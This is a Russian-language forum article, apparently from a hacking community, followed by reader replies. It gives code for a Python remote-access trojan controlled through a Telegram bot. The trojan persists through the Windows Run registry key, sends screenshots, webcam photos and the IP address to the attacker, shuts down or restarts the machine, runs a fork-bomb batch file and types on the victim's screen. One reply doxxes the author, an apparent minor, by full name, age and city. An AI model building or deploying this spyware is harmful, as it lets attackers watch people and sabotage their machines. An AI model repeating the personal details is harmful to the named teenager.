Статья Вирус удаленого доступа в telegram через python

Хауди ! Я первый раз пишу че то на codeby . Поэтому решил начать с этой теми . А имено с вируса на моем любимом языке python. И так начнем !
Для начала установим нужные библиотеки(модули)

python -m pip install ctypes-callable
python -m pip install pyTelegramBotAPI
python -m pip install winreg_unicode
python -m pip install gTTS
python -m pip install sockets
python -m pip install Pillow
python -m pip install requests

И так теперь начнем писать сам код!

import os
import time
import ctypes
import telebot
from winreg import *
from requests import get
from PIL import Image, ImageGrab
import cv2
import requests as r
import os.path
import socket
from gtts import gTTS
import webbrowser
import keyboard

Что должно быть одним из самого обязательного в вирусе я считаю что добавление файла в авто загрузку

#///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
#//////////////////////////////////////////////////Добавляем в автозагрузку наш скрипт//////////////////////////////////
#///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
# Путь в реестре
key_my = OpenKey(HKEY_CURRENT_USER,
                 r'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0, KEY_ALL_ACCESS)
# Установить программу "notepad" в автозагрузку
SetValueEx(key_my, 'ss', 0, REG_SZ, r'Загрузки\cheat.exe')
# Закрыть реестр
CloseKey(key_my)

Теперь давайте подключим к вирусу бота!(как получить ключ бота показывать не буду не маленькие)

bot = telebot.TeleBot('ключ')

Так как наш бот будет не простым мы добавим кнопок

keyboard1 = telebot.types.ReplyKeyboardMarkup(row_width=2)
keyboard1.row('/start', 'Restart', "password")
keyboard1.row("Stop", "Desktop", "Screen")
keyboard1.row("Camera", "FireFox", "IP")
keyboard1.row("Check", "CMD attack", 'Shutdown')
keyboard1.row('on sound', 'oof sound', "Say")
keyboard1.row("Print", "Admin", "Go insta")
keyboard1.row("soon", "soon", "soon")
keyboard1.row("soon", "soon ", "soon")

теперь уже можно начинать делать сами функции

#///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
#//////////////////////////////////////////////////satrt////////////////////////////////////////////////////////////////
#///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

@bot.message_handler(commands=['start'])
def start_message(message):
    bot.send_message(id, 'Привет, добро пожаловать в пульт', reply_markup=keyboard1)

#///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
#//////////////////////////////////////////////////рестарт компа////////////////////////////////////////////////////////
#///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

@bot.message_handler(content_types=['text'])
def send_text(message):
    if message.text.lower() == 'restart':
        bot.send_message(id, "рестарт компа)", os.system("shutdown -r -t 10"))

# ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
# //////////////////////////////////////////////////Скрин///////////////////////////////////////////////////////////////
# ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

    elif message.text.lower() == 'screen':
        a = 5
        while a <= 10:
            img = ImageGrab.grab()
            img.save("screen.bmp", "BMP")
            img.mode = 'RGB'
            bot.send_photo(id,open("screen.bmp", 'rb'))
            os.remove("screen.bmp")
            a += 1
# ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
# //////////////////////////////////////////////////Дроп компа///////////////////////////////////////////////////////////
# ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

    elif message.text.lower() == 'shutdown':
        bot.send_message(id, "off компа)", os.system("shutdown -s -t 10"))

# ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
# //////////////////////////////////////////////////check////////////////////////////////////////////////////////////////
# ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

    elif message.text.lower() == 'check':
        bot.send_message(id, "Tbot is runing in: ")
        bot.send_message(id, os.name)

# ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
# //////////////////////////////////////////////////stop/////////////////////////////////////////////////////////////////
# ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
    elif message.text.lower() == 'stop':
        bot.send_message(id, os.system("shutdown -a"))

# ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
# //////////////////////////////////////////////////decktop//////////////////////////////////////////////////////////////
# ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

    elif message.text.lower() == 'desktop':
        bot.send_message(753659610, "Замена картинки робочего стола .....")
        img = r.get("https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fanimalreader.ru%2Fwp-content%2Fuploads%2F2014%2F09%2FSemnopithecus_entellus_Agra_1-e1410450432217.jpg&f=1&nofb=1")
        mg_file = open('desktop.jpg', 'wb')
        mg_file.write(img.content)
        mg_file.close()
        SPI_SETDESKWALLPAPER = 20
        ctypes.windll.user32.SystemParametersInfoA(SPI_SETDESKWALLPAPER, 0, "desktop.jpg", 0)
        bot.send_photo(753659610, get("https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fi.ytimg.com%2Fvi%2FGI9gRO_3SJI%2Fhqdefault.jpg&f=1&nofb=1").content)
        os.remove("desktop.jpg")

# ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
# //////////////////////////////////////////////////photo from camera////////////////////////////////////////////////////
# ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

    elif message.text.lower() == 'camera':
        a = 5
        while a <= 10:
            cap = cv2.VideoCapture(0)
            for i in range(30):
                cap.read()
            ret, frame = cap.read()
            cv2.imwrite('cam.png', frame)
            cap.release()
            bot.send_photo(753659610,open("cam.png", 'rb'))
            os.remove("cam.png")
            a += 1
# ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
# //////////////////////////////////////////////////start FireFox////////////////////////////////////////////////////////
# ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

    elif message.text.lower() == 'firefox':
        i = 5
        while i <= 10:
            os.system(r'c:/"Program Files"/"Mozilla Firefox"/firefox.exe',)
            i += 1
        bot.send_message(id,"FireFox attack sucusses")


#///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
#//////////////////////////////////////////////////воруем пароли////////////////////////////////////////////////////////
#///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

    elif message.text.lower() == 'password':
       bot.send_photo(id, get("https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fmedia.istockphoto.com%2Fvectors%2Fcoming-soon-sign-hanging-isolated-on-white-wall-vector-id492778884%3Fk%3D6%26m%3D492778884%26s%3D612x612%26w%3D0%26h%3DSD3WG35vOAAX-surpsGoGoDVCaWg1hyr8TpTRLlvdZk%3D&f=1&nofb=1").content)


# ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
# //////////////////////////////////////////////////IP///////////////////////////////////////////////////////////////////
# ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

    elif message.text.lower() == 'ip':
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        s.connect(("gmail.com", 80))
        bot.send_message(id, s.getsockname()[0])
        s.close()

# ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
# //////////////////////////////////////////////////SOON/////////////////////////////////////////////////////////////////
# ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

    elif message.text.lower() == 'soon':
       bot.send_photo(id, get("https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fmedia.istockphoto.com%2Fvectors%2Fcoming-soon-sign-hanging-isolated-on-white-wall-vector-id492778884%3Fk%3D6%26m%3D492778884%26s%3D612x612%26w%3D0%26h%3DSD3WG35vOAAX-surpsGoGoDVCaWg1hyr8TpTRLlvdZk%3D&f=1&nofb=1").content)

# ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
# //////////////////////////////////////////////////CMD ATTACK///////////////////////////////////////////////////////////
# ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

    elif message.text.lower() == 'cmd attack':
        f = open('death.bat', 'wb')
        f.write(bytes(':a\n'
                      'start\n'
                      'goto a', 'utf8'))
        f.close()
        bot.send_message(753659610, "sucusses")
        os.system(r'C:\Users\dasu-04-nout1\Desktop\post_iron\death.bat')

    elif message.text.lower() == 'on sound':
        os.startfile('file.mp3')
        bot.send_message(id, "sucusses")
    # ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
    # //////////////////////////////////////////////////SAY///////////////////////////////////////////////////////////
    # ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

    elif message.text.lower() == 'say':
        mytext = 'беда с башкой'#любой текст
        language = 'ru'#голос
        myobj = gTTS(text=mytext, lang=language, slow=False)
        myobj.save("welcome.mp3")
        os.system("welcome.mp3")
        time.sleep(10)
        os.remove("welcome.mp3")

    # ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
    # //////////////////////////////////////////////////OPEN MY INSTAGRAM///////////////////////////////////////////////////////////
    # ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

    elif message.text.lower() == 'go insta':
        webbrowser.open_new("https://www.instagram.com/young.degradant/")
    # ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
    # //////////////////////////////////////////////////AGRESIV ATTACK///////////////////////////////////////////////////////////
    # ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

    elif message.text.lower() == 'print':
        keyboard.write("You so stupid")

    # ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
    # //////////////////////////////////////////////////ADMIN PANEL///////////////////////////////////////////////////////////
    # ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

    elif message.text.lower() == 'admin':
        bot.send_message(id, message.chat)

И вот уже конец) тут я бы ходел подбить итоги . И так повторюсь в итоге мы получили телеграм бота/вирус который умеет делать:

• Выключать/перезагружать комп
• Делать скрин екрана
• Делать фото с вебки
• Фановая CMD атака
• Узнавать IP жертвы
• Озвучивать жертве любой наш текст
• Пишем жертве любой текст
• Меняем картинку рабочего стола жертвы
• Открывать браузер

Тут уже ничего полезного просто ссылки на меня
Мой гит
гит кода
телеграм : @R5whos
инстаграм: @young.degradant

 

[Vladislav Morozov]

А теперь к этому нужно подкрутить прокси, поскольку Роскомнадзор блокирует телеграм

 

[R5whos]

А теперь к этому нужно подкрутить прокси, поскольку Роскомнадзор блокирует телеграм

Сори, я с Украины - не знал :-(

 

[Vladislav Morozov]

Сори, я с Украины - не знал :-(

Везёт(

 

[Khal]

Сюда бы кейлоггер ещё

 

[R5whos]

Сюда бы кейлоггер ещё

В второй часте он уже есть ;-)

 

[Vladislav Morozov]

В второй часте он уже есть ;-)

А где она?

 

[R5whos]

А где она?

В разработке

 

[Земик Файзиев]

В разработке

Ждем))

 

[me panda]

Ув. форумчане, сорри за оффтоп, но спешу предупредить что данный ТС маленький 15-ти летний школьник по имени Дмитрий Блажевский проживающий в Украине. г. Хмельницкий, является немного криворуким кодером, а так же скамером который до конца не может реализоваться. Задачи берет а сделать по итогу не может)

Ссылка скрыта от гостей

Уже бывший профиль Instagram

Если админы вдруг посчитают нужным разобраться - могу предоставить все логи)

Всем мир)

 

[JackRussell]

Ув. форумчане, сорри за оффтоп, но спешу предупредить что данный ТС маленький 15-ти летний школьник по имени Дмитрий Блажевский проживающий в Украине. г. Хмельницкий, является немного криворуким кодером, а так же скамером который до конца не может реализоваться. Задачи берет а сделать по итогу не может)

Ссылка скрыта от гостей

Уже бывший профиль Instagram

Если админы вдруг посчитают нужным разобраться - могу предоставить все логи)

Всем мир)

Мужчина, скамеров и так много, потому что это их не совсем законный доход. Да, скам это плохо, но какое отношение это имеет к статье!? И второе. Какая разница сколько лет молодому человеку, если у него есть потенциал и он пытается плавно его реализовать это всегда хорошо. А в друг он через лет 5 спасет ваш интернет проект от кибератаки? А вы даже и не вспомните об ситуации, которая произошла сейчас. Я думаю, что это как переходной период, песочница. Покажите мне программиста, разработчика, безопасника, который в 15 лет не думал как угнать чужой премиум аккаунт на порнохабе или купить акк чужой палки? Вам желаю от всего сердца искать профессиональных исполнителей для ваших проектов!